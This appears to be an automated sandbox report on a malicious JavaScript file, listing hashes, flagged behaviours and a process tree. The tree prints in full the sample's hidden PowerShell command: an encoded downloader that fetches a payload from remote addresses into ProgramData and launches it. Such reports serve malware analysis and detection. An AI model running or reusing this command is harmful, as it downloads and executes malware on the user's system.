Analysis
-
max time kernel
27s -
max time network
31s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16-05-2023 01:19
Static task
static1
Behavioral task
behavioral1
Sample
7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js
Resource
win10v2004-20230221-en
General
-
Target
7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js
-
Size
169KB
-
MD5
677b6481f8fe02de33603553b9ee1b2e
-
SHA1
1d856b877ff18d5f2777a53421c1084c39dbfd6a
-
SHA256
7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b
-
SHA512
74775d7170a961c73889279399974505af63c7d4bb8abbabef10754fb5c61bec6c9fed559947dbb28ff47228ff279322cbc91f1f10676ce6b379cfe2fbf139bb
-
SSDEEP
3072:IcRjXS0ZkD3FtfRRuTXj3fpby2JKfvf25w206IzIXyl56ExfomXDHiZBtm:vXtkD3FPwTzPpe2JKnf25w2CzIXyl568
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1424 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1948 wrote to memory of 1240 1948 wscript.exe 27 PID 1948 wrote to memory of 1240 1948 wscript.exe 27 PID 1948 wrote to memory of 1240 1948 wscript.exe 27 PID 1240 wrote to memory of 1424 1240 wscript.exe 28 PID 1240 wrote to memory of 1424 1240 wscript.exe 28 PID 1240 wrote to memory of 1424 1240 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js1⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\7daeead9495651433e9a5aa4c9fb74bdc741624c57898a0cda3c74447176955b.js" furcilia conglomeriticCremant ohioanBelonoid NotitionPreinterceding2⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AG8AdQBjAGgAbwB1AHMAIAA9ACAANwA3ADkAOwAkAEIAbABvAHcAcABpAHAAZQBMAGEAdAByAGkAcwAgAD0AIAAiAGMAbwBlAGwAZQBsAG0AaQBuAHQAaABpAGMAIgA7ACQASABhAHQAYgByAHUAcwBoAE0AYQB6AGEAZQBkAGkAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAD0AcABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAUQBCAGkAQQBHADQAQQBhAFEAQgAyAEEARwBVAEEAWQBRAEIAdQBBAEUARQBBAFoAUQBCAHkAQQBHADgAQQBjAEEAQgBvAEEARwA4AEEAWQBnAEIAcABBAEcATQBBAEwAZwBCAHMAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAYQBRAEIAdQBBAEcAYwBBAHAAQwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFEAQQBIAFUAQQBiAEEAQgBoAEEARwBvAEEAWQBRAEIAdQBBAEMANABBAGEAQQBCAHYAQQBIAE0AQQBjAEEAQgBwAEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AHAAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7ACQAcgBlAGYAbwByAG0AYQBkAG8AIAA9ACAAMQA3ADAAOwAkAE0AaQBkAG8AYwBlAGEAbgAgAD0AIAA5ADIANAA7ACQAdQBuAGQAZQBiAGEAdABlAGQAIAA9ACAAIgBBAG4AdABpAGEAbgBhAHIAYwBoAGkAYwAiADsAJABMAGkAZwBoAHQAcwBvAG0AZQBsAHkAVABhAGwAYQBiAG8AbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAawBBAE8AQQBBAHYAQQBIAEUAQQBaAGcAQgBpAEEARwBZAEEAZABRAEEAdgBBAEUAcwBBAE4AdwBBADEAQQBEAFkAQQBTAFEAQgA0AEEAQQA9AD0AUwA9AHcASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBPAEEAQQB2AEEASABVAEEAVgBnAEIAMwBBAEcAMABBAE0AQQBCAEIAQQBDADgAQQBiAEEAQQAzAEEARgBZAEEAVAB3AEIATABBAEgARQBBAE4AZwBCAEIAQQBIAEEAQQBiAEEAQgBEAEEARQAwAEEAUwA9AHcASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBWAEEARwBFAEEAWgBnAEIAbwBBAEUAbwBBAGQAUQBCAHAAQQBFAGcAQQBUAFEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHQAaAByAG8AZABkAGUAbgAgAGkAbgAgACQATABpAGcAaAB0AHMAbwBtAGUAbAB5AFQAYQBsAGEAYgBvAG4AIAAtAHMAcABsAGkAdAAgACIAUwA9AHcASQAiACkAIAB7ACQAaQBuAGMAbwByAHIAdQBwAHQAaQBiAGkAbABpAHQAeQBVAG4AdwByAGUAYQB0AGgAaQBuAGcAIAA9ACAAOQA2ADkAOwB0AHIAeQAgAHsAJABVAG4AZQBtAGIAYQBuAGsAZQBkAEUAbgB0AGUAcgBvAG0AZQBzAGUAbgB0AGUAcgBpAGMAIAA9ACAANwA4ADAAOwAkAHMAaAByAGkAZQB2AGUAZABDAGwAbwB0AHUAcgBpAG4AZwAgAD0AIAAiAGIAZQBzAHQAcgBvAHcAaQBuAGcAVABvAHAAaQBhAHIAeQAiADsAJABIAG8AcABwAGUAcgBnAHIAYQBzAHMAQwBhAG0AbQBvAGMAawAgAD0AIAAyADgANQA7ACQAYQB3AGUAcwBvAG0AZQBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdABoAHIAbwBkAGQAZQBuACkAKQA7AHcAZwBlAHQAIAAkAGEAdwBlAHMAbwBtAGUAbAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYQBkAGkAYQBwAGgAbwByAGkAdABlAFAAbwB0AHMAdABpAGMAawAuAGcAZQBvAGwAbwBnAGkAcwB0ADsAJAB2AGUAcgBiAGEAbABpAHMAbQAgAD0AIAAiAGIAbwByAGEAYgBsAGUAIgA7ACQAVAByAG8AcABoAGUAbQBhACAAPQAgADUANwA5ADsAJABlAHMAdABhAG4AYwBpAGEAcwAgAD0AIAAiAEYAYQBpAHQAaABiAHIAZQBhAGsAZQByAE8AbwBlAGMAaQBhACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYQBkAGkAYQBwAGgAbwByAGkAdABlAFAAbwB0AHMAdABpAGMAawAuAGcAZQBvAGwAbwBnAGkAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAxADMANgA2ADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFkAUQBCAGsAQQBHAGsAQQBZAFEAQgB3AEEARwBnAEEAYgB3AEIAeQBBAEcAawBBAGQAQQBCAGwAQQBGAEEAQQBiAHcAQgAwAEEASABNAEEAZABBAEIAcABBAEcATQBBAGEAdwBBAHUAQQBHAGMAQQBaAFEAQgB2AEEARwB3AEEAYgB3AEIAbgBBAEcAawBBAGMAdwBCADAAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEIAbABhAGMAawBiAGEAbABsAGUAcgBIAG8AbQBvAHQAbwBuAGkAYwAgAD0AIAA1ADkANAA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABhAGwAYQBtAGUAZABhAHMAIAA9ACAAMwA1ADcAOwB9AH0AJABTAHkAbgBhAG4AZwBpAHUAbQAgAD0AIAAiAGkAbQBwAG8AdQBuAGQAaQBuAGcAIgA7AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-